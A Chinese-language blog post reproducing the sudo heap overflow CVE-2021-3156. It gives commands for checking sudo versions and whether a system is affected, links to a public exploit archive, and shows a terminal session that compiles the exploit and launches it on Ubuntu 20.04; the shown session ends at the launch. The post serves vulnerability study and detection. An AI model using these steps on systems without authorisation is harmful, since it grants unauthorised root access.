Linux sudo 权限提升漏洞复现 (CVE-2021-3156)

地球胖头鱼 2021-02-01
Web安全 发布于 2021-02-01 10:06:23 阅读 185 评论 0

前言

前几天我发了一篇文章,在1月26号当天Sudo发布了安全通告,称修复了一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。漏洞详情可以点这里去看一下这篇文章,里面详细介绍了该漏洞的原理和简单修复方法。目前漏洞的细节已经公开的非常全面了,受影响的用户尽快采取措施吧。

漏洞检测

  1. 查看sudo版本

    sudo --version

  2. 检测是否存在漏洞

    sudoedit -s /
    • 若返回如图以“ sudoedit:”开头的错误,则当前系统可能存在安全风险。
    • 不受影响的系统将显示以“ usage:”开头的错误

EXP利用

利用细节

具体利用细节可以访问改网址自行查看,这里就不过多叙述了。

https://www.kalmarunionen.dk/writeups/sudo/

exp地址

https://haxx.in/CVE-2021-3156_nss_poc_ubuntu.tar.gz

操作如下

test@dz:~/CVE-2021-3156$ id
uid=1001(test) gid=1001(test)=1001(test)
test@dz:~/CVE-2021-3156$ lsb_release -a
No LSB modules are available.
Distributor ID:  Ubuntu
Description:  Ubuntu 20.04.1 LTS
Release:  20.04
Codename:  focal
test@dz:~/CVE-2021-3156$ uname -a
Linux dz 5.4.0-47-generic #51-Ubuntu SMP Fri Sep 4 19:50:52 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
test@dz:~/CVE-2021-3156$ sudo -V
Sudo 版本 1.8.31
Sudoers 策略插件版本 1.8.31
Sudoers 文件语法版本 46
Sudoers I/O plugin version 1.8.31
test@dz:~/CVE-2021-3156$ id
uid=1001(test) gid=1001(test)=1001(test)
test@dz:~/CVE-2021-3156$ make
rm -rf libnss_X
mkdir libnss_X
gcc -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c
test@dz:~/CVE-2021-3156$ ls
CVE-2021-3156_nss_poc_ubuntu  hax.c  lib.c  libnss_X  Makefile  sudo-hax-me-a-sandwich
test@dz:~/CVE-2021-3156$ ./sudo-hax-me-a-sandwich

本作品采用《CC 协议》,转载必须注明作者和本文链接
讨论数量: 0
(= ̄ω ̄=)··· 暂无内容!
请勿发布不友善或者负能量的内容。与人为善,比聪明更重要!
地球胖头鱼
未填写
  • 作者发布文章207
  • 作者收获粉丝7
  • 作者收到点赞0
  • 所有文章被收藏了1
  • 博客总访问量排行第2
  • 博客总访问量4.5 万(每日更新)
查看所有博文